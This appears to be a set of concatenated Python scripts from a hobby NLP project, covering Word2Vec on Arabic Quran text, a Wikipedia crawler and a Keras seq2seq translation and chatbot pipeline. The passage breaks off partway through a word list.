print("Pickling data for future use to", pickle_filename)
pickle.dump((vocab, int2word, word2int, new_text), open(pickle_filename, "wb"))
return vocab, int2word, word2int, new_text
def get_size(size, suffix="B"):
factor = 1024
for unit in ['', 'K', 'M', 'G', 'T', 'P']:
if size < factor:
return "{:.2f}{}{}".format(size, unit, suffix)
size /= factor
return "{:.2f}{}{}".format(size, "E", suffix)
import wikipedia
from threading import Thread
def gather(page_name):
print(f"Crawling {page_name}")
page = wikipedia.page(page_name)
filename = page_name.replace(" ", "_")
print(page.content, file=open(f"data/{filename}.txt", 'w', encoding="utf-8"))
print(f"Done crawling {page_name}")
for i in range(5):
Thread(target=gather, args=(page.links[i],)).start()
if __name__ == "__main__":
pages = ["Relativity"]
for page in pages:
gather(page)
# from keras.preprocessing.text import Tokenizer
from utils import chunk_seq
from collections import Counter
from nltk.corpus import stopwords
from keras.preprocessing.sequence import pad_sequences
import numpy as np
import gensim
sequence_length = 200
embedding_dim = 200
# window_size = 7
# vector_dim = 300
# epochs = 1000
# valid_size = 16 # Random set of words to evaluate similarity on.
# valid_window = 100 # Only pick dev samples in the head of the distribution.
# valid_examples = np.random.choice(valid_window, valid_size, replace=False)
with open("data/quran_cleaned.txt", encoding="utf8") as f:
text = f.read()
# print(text[:500])
ayat = text.split(".")
words = []
for ayah in ayat:
words.append(ayah.split())
# print(words[:5])
# stop words
stop_words = stopwords.words("arabic")
# most common come at the top
# vocab = [ w[0] for w in Counter(words).most_common() if w[0] not in stop_words]
# words = [ word for word in words if word not in stop_words]
new_words = []
for ayah in words:
new_words.append([ w for w in ayah if w not in stop_words])
# print(len(vocab))
# n = len(words) / sequence_length
# # split text to n sequences
# print(words[:10])
# words = chunk_seq(words, len(ayat))
vocab = []
for ayah in new_words:
for w in ayah:
vocab.append(w)
vocab = sorted(set(vocab))
vocab2int = {w: i for i, w in enumerate(vocab, start=1)}
int2vocab = {i: w for i, w in enumerate(vocab, start=1)}
encoded_words = []
for ayah in new_words:
encoded_words.append([ vocab2int[w] for w in ayah ])
encoded_words = pad_sequences(encoded_words)
# print(encoded_words[10])
words = []
for seq in encoded_words:
words.append([ int2vocab[w] if w != 0 else "_unk_" for w in seq ])
# print(words[:5])
# # define model
print("Training Word2Vec Model...")
model = gensim.models.Word2Vec(sentences=words, size=embedding_dim, workers=7, min_count=1, window=6)
path_to_save = r"E:\datasets\word2vec_quran.txt"
print("Saving model...")
model.wv.save_word2vec_format(path_to_save, binary=False)
# print(dir(model))
from keras.layers import Embedding, LSTM, Dense, Activation, BatchNormalization
from keras.layers import Flatten
from keras.models import Sequential
from preprocess import words, vocab, sequence_length, sequences, vector_dim
from preprocess import window_size
model = Sequential()
model.add(Embedding(len(vocab), vector_dim, input_length=sequence_length))
model.add(Flatten())
model.add(Dense(1))
model.compile("adam", "binary_crossentropy")
model.fit()
def chunk_seq(seq, num):
avg = len(seq) / float(num)
out = []
last = 0.0
while last < len(seq):
out.append(seq[int(last):int(last + avg)])
last += avg
return out
def encode_words(words, vocab2int):
# encoded = [ vocab2int[word] for word in words ]
encoded = []
append = encoded.append
for word in words:
c = vocab2int.get(word)
if c:
append(c)
return encoded
def remove_stop_words(vocab):
# remove stop words
vocab.remove("the")
vocab.remove("of")
vocab.remove("and")
vocab.remove("in")
vocab.remove("a")
vocab.remove("to")
vocab.remove("is")
vocab.remove("as")
vocab.remove("for")
# encoding: utf-8
"""
author: BrikerMan
contact: eliyar917gmail.com
blog: https://eliyar.biz
version: 1.0
license: Apache Licence
file: w2v_visualizer.py
time: 2017/7/30 9:37
"""
import sys
import os
import pathlib
import numpy as np
from gensim.models.keyedvectors import KeyedVectors
import tensorflow as tf
from tensorflow.contrib.tensorboard.plugins import projector
def visualize(model, output_path):
meta_file = "w2x_metadata.tsv"
placeholder = np.zeros((len(model.wv.index2word), model.vector_size))
with open(os.path.join(output_path, meta_file), 'wb') as file_metadata:
for i, word in enumerate(model.wv.index2word):
placeholder[i] = model[word]
# temporary solution for https://github.com/tensorflow/tensorflow/issues/9094
if word == '':
print("Emply Line, should replecaed by any thing else, or will cause a bug of tensorboard")
file_metadata.write("{0}".format('<Empty Line>').encode('utf-8') + b'\n')
else:
file_metadata.write("{0}".format(word).encode('utf-8') + b'\n')
# define the model without training
sess = tf.InteractiveSession()
embedding = tf.Variable(placeholder, trainable=False, name='w2x_metadata')
tf.global_variables_initializer().run()
saver = tf.train.Saver()
writer = tf.summary.FileWriter(output_path, sess.graph)
# adding into projector
config = projector.ProjectorConfig()
embed = config.embeddings.add()
embed.tensor_name = 'w2x_metadata'
embed.metadata_path = meta_file
# Specify the width and height of a single thumbnail.
projector.visualize_embeddings(writer, config)
saver.save(sess, os.path.join(output_path, 'w2x_metadata.ckpt'))
print('Run tensorboard --logdir={0} to run visualize result on tensorboard'.format(output_path))
if __name__ == "__main__":
"""
Use model.save_word2vec_format to save w2v_model as word2evc format
Then just run python w2v_visualizer.py word2vec.text visualize_result
"""
try:
model_path = sys.argv[1]
output_path = sys.argv[2]
except:
print("Please provice model path and output path")
model = KeyedVectors.load_word2vec_format(model_path)
pathlib.Path(output_path).mkdir(parents=True, exist_ok=True)
visualize(model, output_path)
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
import numpy as np
import pickle
import tqdm
class NMTGenerator:
"""A class utility for generating Neural-Machine-Translation large datasets"""
def __init__(self, source_file, target_file, num_encoder_tokens=None, num_decoder_tokens=None,
source_sequence_length=None, target_sequence_length=None, x_tk=None, y_tk=None,
batch_size=256, validation_split=0.15, load_tokenizers=False, dump_tokenizers=True,
same_tokenizer=False, char_level=False, verbose=0):
self.source_file = source_file
self.target_file = target_file
self.same_tokenizer = same_tokenizer
self.char_level = char_level
if not load_tokenizers:
# x ( source ) tokenizer
self.x_tk = x_tk if x_tk else Tokenizer(char_level=self.char_level)
# y ( target ) tokenizer
self.y_tk = y_tk if y_tk else Tokenizer(char_level=self.char_level)
else:
self.x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
self.y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
# remove '?' and '.' from filters
# which means include them in vocabulary
# add "'" to filters
self.x_tk.filters = self.x_tk.filters.replace("?", "").replace("_", "") + "'"
self.y_tk.filters = self.y_tk.filters.replace("?", "").replace("_", "") + "'"
if char_level:
self.x_tk.filters = self.x_tk.filters.replace(".", "").replace(",", "")
self.y_tk.filters = self.y_tk.filters.replace(".", "").replace(",", "")
if same_tokenizer:
self.y_tk = self.x_tk
# max sequence length of source language
self.source_sequence_length = source_sequence_length
# max sequence length of target language
self.target_sequence_length = target_sequence_length
# vocab size of encoder
self.num_encoder_tokens = num_encoder_tokens
# vocab size of decoder
self.num_decoder_tokens = num_decoder_tokens
# the batch size
self.batch_size = batch_size
# the ratio which the dataset will be partitioned
self.validation_split = validation_split
# whether to dump x_tk and y_tk when finished tokenizing
self.dump_tokenizers = dump_tokenizers
# cap to remove _unk_ samples
self.n_unk_to_remove = 2
self.verbose = verbose
def load_dataset(self):
"""Loads the dataset:
1. load the data from files
2. tokenize and calculate sequence lengths and num_tokens
3. post pad the sequences"""
self.load_data()
if self.verbose:
print("[+] Data loaded")
self.tokenize()
if self.verbose:
print("[+] Text tokenized")
self.pad_sequences()
if self.verbose:
print("[+] Sequences padded")
self.split_data()
if self.verbose:
print("[+] Data splitted")
def load_data(self):
"""Loads data from files"""
self.X = load_data(self.source_file)
self.y = load_data(self.target_file)
# remove much unks on a single sample
X, y = [], []
co = 0
for question, answer in zip(self.X, self.y):
if question.count("_unk_") >= self.n_unk_to_remove or answer.count("_unk_") >= self.n_unk_to_remove:
co += 1
else:
X.append(question)
y.append(answer)
self.X = X
self.y = y
if self.verbose >= 1:
print("[*] Number of samples:", len(self.X))
if self.verbose >= 2:
print("[!] Number of samples deleted:", co)
def tokenize(self):
"""Tokenizes sentences/strings as well as calculating input/output sequence lengths
and input/output vocab sizes"""
self.x_tk.fit_on_texts(self.X)
self.y_tk.fit_on_texts(self.y)
self.X = self.x_tk.texts_to_sequences(self.X)
self.y = self.y_tk.texts_to_sequences(self.y)
# calculate both sequence lengths ( source and target )
self.source_sequence_length = max([len(x) for x in self.X])
self.target_sequence_length = max([len(x) for x in self.y])
# calculating number of encoder/decoder vocab sizes
self.num_encoder_tokens = len(self.x_tk.index_word) + 1
self.num_decoder_tokens = len(self.y_tk.index_word) + 1
# dump tokenizers
pickle.dump(self.x_tk, open("results/x_tk.pickle", "wb"))
pickle.dump(self.y_tk, open("results/y_tk.pickle", "wb"))
def pad_sequences(self):
"""Pad sequences"""
self.X = pad_sequences(self.X, maxlen=self.source_sequence_length, padding='post')
self.y = pad_sequences(self.y, maxlen=self.target_sequence_length, padding='post')
def split_data(self):
"""split training/validation sets using self.validation_split"""
split_value = int(len(self.X)*self.validation_split)
self.X_test = self.X[:split_value]
self.X_train = self.X[split_value:]
self.y_test = self.y[:split_value]
self.y_train = self.y[split_value:]
# free up memory
del self.X
del self.y
def shuffle_data(self, train=True):
"""Shuffles X and y together
:params train (bool): whether to shuffle training data, default is True
Note that when train is False, testing data is shuffled instead."""
state = np.random.get_state()
if train:
np.random.shuffle(self.X_train)
np.random.set_state(state)
np.random.shuffle(self.y_train)
else:
np.random.shuffle(self.X_test)
np.random.set_state(state)
np.random.shuffle(self.y_test)
def next_train(self):
"""Training set generator"""
return self.generate_batches(self.X_train, self.y_train, train=True)
def next_validation(self):
"""Validation set generator"""
return self.generate_batches(self.X_test, self.y_test, train=False)
def generate_batches(self, X, y, train=True):
"""Data generator"""
same_tokenizer = self.same_tokenizer
batch_size = self.batch_size
char_level = self.char_level
source_sequence_length = self.source_sequence_length
target_sequence_length = self.target_sequence_length
if same_tokenizer:
num_encoder_tokens = max([self.num_encoder_tokens, self.num_decoder_tokens])
num_decoder_tokens = num_encoder_tokens
else:
num_encoder_tokens = self.num_encoder_tokens
num_decoder_tokens = self.num_decoder_tokens
while True:
for j in range(0, len(X), batch_size):
encoder_input_data = X[j: j+batch_size]
decoder_input_data = y[j: j+batch_size]
# update batch size ( different size in last batch of the dataset )
batch_size = encoder_input_data.shape[0]
if self.char_level:
encoder_data = np.zeros((batch_size, source_sequence_length, num_encoder_tokens))
decoder_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens))
else:
encoder_data = encoder_input_data
decoder_data = decoder_input_data
decoder_target_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens))
if char_level:
# if its char level, one-hot all sequences of characters
for i, sequence in enumerate(decoder_input_data):
for t, word_index in enumerate(sequence):
if t > 0:
decoder_target_data[i, t - 1, word_index] = 1
decoder_data[i, t, word_index] = 1
for i, sequence in enumerate(encoder_input_data):
for t, word_index in enumerate(sequence):
encoder_data[i, t, word_index] = 1
else:
# if its word level, one-hot only target_data ( the one compared with dense )
for i, sequence in enumerate(decoder_input_data):
for t, word_index in enumerate(sequence):
if t > 0:
decoder_target_data[i, t - 1, word_index] = 1
yield ([encoder_data, decoder_data], decoder_target_data)
# shuffle data when an epoch is finished
self.shuffle_data(train=train)
def get_embedding_vectors(tokenizer):
embedding_index = {}
with open("data/glove.6B.300d.txt", encoding='utf8') as f:
for line in tqdm.tqdm(f, "Reading GloVe"):
values = line.split()
word = values[0]
vectors = np.asarray(values[1:], dtype='float32')
embedding_index[word] = vectors
word_index = tokenizer.word_index
embedding_matrix = np.zeros((len(word_index)+1, 300))
for word, i in word_index.items():
embedding_vector = embedding_index.get(word)
if embedding_vector is not None:
# words not found will be 0s
embedding_matrix[i] = embedding_vector
return embedding_matrix
def load_data(filename):
text = []
append = text.append
with open(filename) as f:
for line in tqdm.tqdm(f, f"Reading {filename}"):
line = line.strip()
append(line)
return text
# def generate_batch(X, y, num_decoder_tokens, max_length_src, max_length_target, batch_size=256):
# """Generating data"""
# while True:
# for j in range(0, len(X), batch_size):
# encoder_input_data = np.zeros((batch_size, max_length_src), dtype='float32')
# decoder_input_data = np.zeros((batch_size, max_length_target), dtype='float32')
# decoder_target_data = np.zeros((batch_size, max_length_target, num_decoder_tokens), dtype='float32')
# for i, (input_text, target_text) in enumerate(zip(X[j: j+batch_size], y[j: j+batch_size])):
# for t, word in enumerate(input_text.split()):
# encoder_input_data[i, t] = input_word_index[word] # encoder input sequence
# for t, word in enumerate(target_text.split()):
# if t > 0:
# # offset by one timestep
# # one-hot encoded
# decoder_target_data[i, t-1, target_token_index[word]] = 1
# if t < len(target_text.split()) - 1:
# decoder_input_data[i, t] = target_token_index[word]
# yield ([encoder_input_data, decoder_input_data], decoder_target_data)
# def tokenize(x, tokenizer=None):
# """Tokenize x
# :param x: List of sentences/strings to be tokenized
# :return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
# if tokenizer:
# t = tokenizer
# else:
# t = Tokenizer()
# t.fit_on_texts(x)
# return t.texts_to_sequences(x), t
# def pad(x, length=None):
# """Pad x
# :param x: list of sequences
# :param length: Length to pad the sequence to, If None, use length
# of longest sequence in x.
# :return: Padded numpy array of sequences"""
# return pad_sequences(x, maxlen=length, padding="post")
# def preprocess(x, y):
# """Preprocess x and y
# :param x: Feature list of sentences
# :param y: Label list of sentences
# :return: Tuple of (preprocessed x, preprocessed y, x tokenizer, y tokenizer)"""
# preprocess_x, x_tk = tokenize(x)
# preprocess_y, y_tk = tokenize(y)
# preprocess_x2 = [ [0] + s for s in preprocess_y ]
# longest_x = max([len(i) for i in preprocess_x])
# longest_y = max([len(i) for i in preprocess_y]) + 1
# # max_length = len(x_tk.word_index) if len(x_tk.word_index) > len(y_tk.word_index) else len(y_tk.word_index)
# max_length = longest_x if longest_x > longest_y else longest_y
# preprocess_x = pad(preprocess_x, length=max_length)
# preprocess_x2 = pad(preprocess_x2, length=max_length)
# preprocess_y = pad(preprocess_y, length=max_length)
# # preprocess_x = to_categorical(preprocess_x)
# # preprocess_x2 = to_categorical(preprocess_x2)
# preprocess_y = to_categorical(preprocess_y)
# return preprocess_x, preprocess_x2, preprocess_y, x_tk, y_tk
from keras.layers import Embedding, TimeDistributed, Dense, GRU, LSTM, Input
from keras.models import Model, Sequential
from keras.utils import to_categorical
import numpy as np
import tqdm
def encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens, embedding_matrix=None, embedding_layer=True):
# ENCODER
# define an input sequence and process it
if embedding_layer:
encoder_inputs = Input(shape=(None,))
if embedding_matrix is None:
encoder_emb_layer = Embedding(num_encoder_tokens, latent_dim, mask_zero=True)
else:
encoder_emb_layer = Embedding(num_encoder_tokens,
latent_dim,
mask_zero=True,
weights=[embedding_matrix],
trainable=False)
encoder_emb = encoder_emb_layer(encoder_inputs)
else:
encoder_inputs = Input(shape=(None, num_encoder_tokens))
encoder_emb = encoder_inputs
encoder_lstm = LSTM(latent_dim, return_state=True)
encoder_outputs, state_h, state_c = encoder_lstm(encoder_emb)
# we discard encoder_outputs and only keep the states
encoder_states = [state_h, state_c]
# DECODER
# Set up the decoder, using encoder_states as initial state
if embedding_layer:
decoder_inputs = Input(shape=(None,))
else:
decoder_inputs = Input(shape=(None, num_encoder_tokens))
# add an embedding layer
# decoder_emb_layer = Embedding(num_decoder_tokens, latent_dim, mask_zero=True)
if embedding_layer:
decoder_emb = encoder_emb_layer(decoder_inputs)
else:
decoder_emb = decoder_inputs
# we set up our decoder to return full output sequences
# and to return internal states as well, we don't use the
# return states in the training model, but we will use them in inference
decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
decoder_outputs, _, _, = decoder_lstm(decoder_emb, initial_state=encoder_states)
# dense output layer used to predict each character ( or word )
# in one-hot manner, not recursively
decoder_dense = Dense(num_decoder_tokens, activation="softmax")
decoder_outputs = decoder_dense(decoder_outputs)
# finally, the model is defined with inputs for the encoder and the decoder
# and the output target sequence
# turn encoder_input_data & decoder_input_data into decoder_target_data
model = Model([encoder_inputs, decoder_inputs], output=decoder_outputs)
# model.summary()
# define encoder inference model
encoder_model = Model(encoder_inputs, encoder_states)
# define decoder inference model
decoder_state_input_h = Input(shape=(latent_dim,))
decoder_state_input_c = Input(shape=(latent_dim,))
decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]
# Get the embeddings of the decoder sequence
if embedding_layer:
dec_emb2 = encoder_emb_layer(decoder_inputs)
else:
dec_emb2 = decoder_inputs
decoder_outputs, state_h, state_c = decoder_lstm(dec_emb2, initial_state=decoder_states_inputs)
decoder_states = [state_h, state_c]
decoder_outputs = decoder_dense(decoder_outputs)
decoder_model = Model([decoder_inputs] + decoder_states_inputs, [decoder_outputs] + decoder_states)
return model, encoder_model, decoder_model
def predict_sequence(enc, dec, source, n_steps, cardinality, char_level=False):
"""Generate target given source sequence, this function can be used
after the model is trained to generate a target sequence given a source sequence."""
# encode
state = enc.predict(source)
# start of sequence input
if char_level:
target_seq = np.zeros((1, 1, 61))
else:
target_seq = np.zeros((1, 1))
# collect predictions
output = []
for t in range(n_steps):
# predict next char
yhat, h, c = dec.predict([target_seq] + state)
# store predictions
y = yhat[0, 0, :]
if char_level:
sampled_token_index = to_categorical(np.argmax(y), num_classes=61)
else:
sampled_token_index = np.argmax(y)
output.append(sampled_token_index)
# update state
state = [h, c]
# update target sequence
if char_level:
target_seq = np.zeros((1, 1, 61))
else:
target_seq = np.zeros((1, 1))
target_seq[0, 0] = sampled_token_index
return np.array(output)
def decode_sequence(enc, dec, input_seq):
# Encode the input as state vectors.
states_value = enc.predict(input_seq)
# Generate empty target sequence of length 1.
target_seq = np.zeros((1,1))
# Populate the first character of target sequence with the start character.
target_seq[0, 0] = 0
# Sampling loop for a batch of sequences
# (to simplify, here we assume a batch of size 1).
stop_condition = False
decoded_sequence = []
while not stop_condition:
output_tokens, h, c = dec.predict([target_seq] + states_value)
# Sample a token
sampled_token_index = np.argmax(output_tokens[0, -1, :])
# sampled_char = reverse_target_char_index[sampled_token_index]
decoded_sentence.append(output_tokens[0, -1, :])
# Exit condition: either hit max length or find stop token.
if (output_tokens == '<PAD>' or len(decoded_sentence) > 50):
stop_condition = True
# Update the target sequence (of length 1).
target_seq = np.zeros((1,1))
target_seq[0, 0] = sampled_token_index
# Update states
states_value = [h, c]
return decoded_sentence
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
import numpy as np
def tokenize(x, tokenizer=None):
"""Tokenize x
:param x: List of sentences/strings to be tokenized
:return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
if tokenizer:
t = tokenizer
else:
t = Tokenizer()
t.fit_on_texts(x)
return t.texts_to_sequences(x), t
def pad(x, length=None):
"""Pad x
:param x: list of sequences
:param length: Length to pad the sequence to, If None, use length
of longest sequence in x.
:return: Padded numpy array of sequences"""
return pad_sequences(x, maxlen=length, padding="post")
def preprocess(x, y):
"""Preprocess x and y
:param x: Feature list of sentences
:param y: Label list of sentences
:return: Tuple of (preprocessed x, preprocessed y, x tokenizer, y tokenizer)"""
preprocess_x, x_tk = tokenize(x)
preprocess_y, y_tk = tokenize(y)
preprocess_x2 = [ [0] + s for s in preprocess_y ]
longest_x = max([len(i) for i in preprocess_x])
longest_y = max([len(i) for i in preprocess_y]) + 1
# max_length = len(x_tk.word_index) if len(x_tk.word_index) > len(y_tk.word_index) else len(y_tk.word_index)
max_length = longest_x if longest_x > longest_y else longest_y
preprocess_x = pad(preprocess_x, length=max_length)
preprocess_x2 = pad(preprocess_x2, length=max_length)
preprocess_y = pad(preprocess_y, length=max_length)
# preprocess_x = to_categorical(preprocess_x)
# preprocess_x2 = to_categorical(preprocess_x2)
preprocess_y = to_categorical(preprocess_y)
return preprocess_x, preprocess_x2, preprocess_y, x_tk, y_tk
def load_data(filename):
with open(filename) as f:
text = f.read()
return text.split("\n")
def load_dataset():
english_sentences = load_data("data/small_vocab_en")
french_sentences = load_data("data/small_vocab_fr")
return preprocess(english_sentences, french_sentences)
# def generate_batch(X, y, num_decoder_tokens, max_length_src, max_length_target, batch_size=256):
# """Generating data"""
# while True:
# for j in range(0, len(X), batch_size):
# encoder_input_data = np.zeros((batch_size, max_length_src), dtype='float32')
# decoder_input_data = np.zeros((batch_size, max_length_target), dtype='float32')
# decoder_target_data = np.zeros((batch_size, max_length_target, num_decoder_tokens), dtype='float32')
# for i, (input_text, target_text) in enumerate(zip(X[j: j+batch_size], y[j: j+batch_size])):
# for t, word in enumerate(input_text.split()):
# encoder_input_data[i, t] = input_word_index[word] # encoder input sequence
# for t, word in enumerate(target_text.split()):
# if t > 0:
# # offset by one timestep
# # one-hot encoded
# decoder_target_data[i, t-1, target_token_index[word]] = 1
# if t < len(target_text.split()) - 1:
# decoder_input_data[i, t] = target_token_index[word]
# yield ([encoder_input_data, decoder_input_data], decoder_target_data)
if __name__ == "__main__":
from generator import NMTGenerator
gen = NMTGenerator(source_file="data/small_vocab_en", target_file="data/small_vocab_fr")
gen.load_dataset()
print(gen.num_decoder_tokens)
print(gen.num_encoder_tokens)
print(gen.source_sequence_length)
print(gen.target_sequence_length)
print(gen.X.shape)
print(gen.y.shape)
for i, ((encoder_input_data, decoder_input_data), decoder_target_data) in enumerate(gen.generate_batches()):
# print("encoder_input_data.shape:", encoder_input_data.shape)
# print("decoder_output_data.shape:", decoder_input_data.shape)
if i % (len(gen.X) // gen.batch_size + 1) == 0:
print(i, ": decoder_input_data:", decoder_input_data[0])
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from models import predict_sequence, encoder_decoder_model
from preprocess import tokenize, pad
from keras.utils import to_categorical
from generator import get_embedding_vectors
import pickle
import numpy as np
x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
index_to_words = {id: word for word, id in y_tk.word_index.items()}
index_to_words[0] = '_'
def logits_to_text(logits):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
# return ' '.join([index_to_words[prediction] for prediction in np.argmax(logits, 1)])
return ' '.join([index_to_words[prediction] for prediction in logits])
num_encoder_tokens = 29046
num_decoder_tokens = 29046
latent_dim = 300
# embedding_vectors = get_embedding_vectors(x_tk)
model, enc, dec = encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens)
enc.summary()
dec.summary()
model.summary()
model.load_weights("results/chatbot_v13_4.831_0.219.h5")
while True:
text = input("> ")
tokenized = tokenize([text], tokenizer=y_tk)[0]
# print("tokenized:", tokenized)
X = pad(tokenized, length=37)
sequence = predict_sequence(enc, dec, X, 37, num_decoder_tokens)
# print(sequence)
result = logits_to_text(sequence)
print(result)
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from models import predict_sequence, encoder_decoder_model
from preprocess import tokenize, pad
from keras.utils import to_categorical
from generator import get_embedding_vectors
import pickle
import numpy as np
x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
index_to_words = {id: word for word, id in y_tk.word_index.items()}
index_to_words[0] = '_'
def logits_to_text(logits):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
# return ' '.join([index_to_words[prediction] for prediction in np.argmax(logits, 1)])
# return ''.join([index_to_words[np.where(prediction==1)[0]] for prediction in logits])
text = ""
for prediction in logits:
char_index = np.where(prediction)[0][0]
char = index_to_words[char_index]
text += char
return text
num_encoder_tokens = 61
num_decoder_tokens = 61
latent_dim = 384
# embedding_vectors = get_embedding_vectors(x_tk)
model, enc, dec = encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens, embedding_layer=False)
enc.summary()
dec.summary()
model.summary()
model.load_weights("results/chatbot_charlevel_v2_0.32_0.90.h5")
while True:
text = input("> ")
tokenized = tokenize([text], tokenizer=y_tk)[0]
# print("tokenized:", tokenized)
X = to_categorical(pad(tokenized, length=37), num_classes=num_encoder_tokens)
# print(X)
sequence = predict_sequence(enc, dec, X, 206, num_decoder_tokens, char_level=True)
# print(sequence)
result = logits_to_text(sequence)
print(result)
import numpy as np
import pickle
from models import encoder_decoder_model
from generator import NMTGenerator, get_embedding_vectors
from preprocess import load_dataset
from keras.callbacks import ModelCheckpoint
from keras_adabound import AdaBound
text_gen = NMTGenerator(source_file="data/questions",
target_file="data/answers",
batch_size=32,
same_tokenizer=True,
verbose=2)
text_gen.load_dataset()
print("[+] Dataset loaded.")
num_encoder_tokens = text_gen.num_encoder_tokens
num_decoder_tokens = text_gen.num_decoder_tokens
# get tokenizer
tokenizer = text_gen.x_tk
embedding_vectors = get_embedding_vectors(tokenizer)
print("text_gen.source_sequence_length:", text_gen.source_sequence_length)
print("text_gen.target_sequence_length:", text_gen.target_sequence_length)
num_tokens = max([num_encoder_tokens, num_decoder_tokens])
latent_dim = 300
model, enc, dec = encoder_decoder_model(num_tokens, latent_dim, num_tokens, embedding_matrix=embedding_vectors)
model.summary()
enc.summary()
dec.summary()
del enc
del dec
print("[+] Models created.")
model.compile(optimizer="rmsprop", loss="categorical_crossentropy", metrics=["accuracy"])
print("[+] Model compiled.")
# pickle.dump(x_tk, open("results/x_tk.pickle", "wb"))
print("[+] X tokenizer serialized.")
# pickle.dump(y_tk, open("results/y_tk.pickle", "wb"))
print("[+] y tokenizer serialized.")
# X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
# y = y.reshape((y.shape[0], y.shape[2], y.shape[1]))
print("[+] Dataset reshaped.")
# print("X1.shape:", X1.shape)
# print("X2.shape:", X2.shape)
# print("y.shape:", y.shape)
checkpointer = ModelCheckpoint("results/chatbot_v13_{val_loss:.3f}_{val_acc:.3f}.h5", save_best_only=False, verbose=1)
model.load_weights("results/chatbot_v13_4.806_0.219.h5")
# model.fit([X1, X2], y,
model.fit_generator(text_gen.next_train(),
validation_data=text_gen.next_validation(),
verbose=1,
steps_per_epoch=(len(text_gen.X_train) // text_gen.batch_size),
validation_steps=(len(text_gen.X_test) // text_gen.batch_size),
callbacks=[checkpointer],
epochs=5)
print("[+] Model trained.")
model.save_weights("results/chatbot_v13.h5")
print("[+] Model saved.")
import numpy as np
import pickle
from models import encoder_decoder_model
from generator import NMTGenerator, get_embedding_vectors
from preprocess import load_dataset
from keras.callbacks import ModelCheckpoint
from keras_adabound import AdaBound
text_gen = NMTGenerator(source_file="data/questions",
target_file="data/answers",
batch_size=256,
same_tokenizer=True,
char_level=True,
verbose=2)
text_gen.load_dataset()
print("[+] Dataset loaded.")
num_encoder_tokens = text_gen.num_encoder_tokens
num_decoder_tokens = text_gen.num_decoder_tokens
# get tokenizer
tokenizer = text_gen.x_tk
print("text_gen.source_sequence_length:", text_gen.source_sequence_length)
print("text_gen.target_sequence_length:", text_gen.target_sequence_length)
num_tokens = max([num_encoder_tokens, num_decoder_tokens])
latent_dim = 384
model, enc, dec = encoder_decoder_model(num_tokens, latent_dim, num_tokens, embedding_layer=False)
model.summary()
enc.summary()
dec.summary()
del enc
del dec
print("[+] Models created.")
model.compile(optimizer=AdaBound(lr=1e-3, final_lr=0.1), loss="categorical_crossentropy", metrics=["accuracy"])
print("[+] Model compiled.")
# pickle.dump(x_tk, open("results/x_tk.pickle", "wb"))
print("[+] X tokenizer serialized.")
# pickle.dump(y_tk, open("results/y_tk.pickle", "wb"))
print("[+] y tokenizer serialized.")
# X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
# y = y.reshape((y.shape[0], y.shape[2], y.shape[1]))
print("[+] Dataset reshaped.")
# print("X1.shape:", X1.shape)
# print("X2.shape:", X2.shape)
# print("y.shape:", y.shape)
checkpointer = ModelCheckpoint("results/chatbot_charlevel_v2_{val_loss:.2f}_{val_acc:.2f}.h5", save_best_only=False, verbose=1)
model.load_weights("results/chatbot_charlevel_v2_0.32_0.90.h5")
# model.fit([X1, X2], y,
model.fit_generator(text_gen.next_train(),
validation_data=text_gen.next_validation(),
verbose=1,
steps_per_epoch=(len(text_gen.X_train) // text_gen.batch_size)+1,
validation_steps=(len(text_gen.X_test) // text_gen.batch_size)+1,
callbacks=[checkpointer],
epochs=50)
print("[+] Model trained.")
model.save_weights("results/chatbot_charlevel_v2.h5")
print("[+] Model saved.")
import tqdm
X, y = [], []
with open("data/fr-en", encoding='utf8') as f:
for i, line in tqdm.tqdm(enumerate(f), "Reading file"):
if "europarl-v7" in line:
continue
# X.append(line)
# if i == 2007723 or i == 2007724 or i == 2007725
if i <= 2007722:
X.append(line.strip())
else:
y.append(line.strip())
y.pop(-1)
with open("data/en", "w", encoding='utf8') as f:
for i in tqdm.tqdm(X, "Writing english"):
print(i, file=f)
with open("data/fr", "w", encoding='utf8') as f:
for i in tqdm.tqdm(y, "Writing french"):
print(i, file=f)
import glob
import tqdm
import os
import random
import inflect
p = inflect.engine()
X, y = [], []
special_words = {
"haha", "rockikz", "fullclip", "xanthoss", "aw", "wow", "ah", "oh", "god", "quran", "allah",
"muslims", "muslim", "islam", "?", ".", ",",
'_func_val_get_callme_para1_comma0', '_num2_', '_func_val_get_last_question', '_num1_',
'_func_val_get_number_plus_para1__num1__para2__num2_',
'_func_val_update_call_me_enforced_para1__callme_',
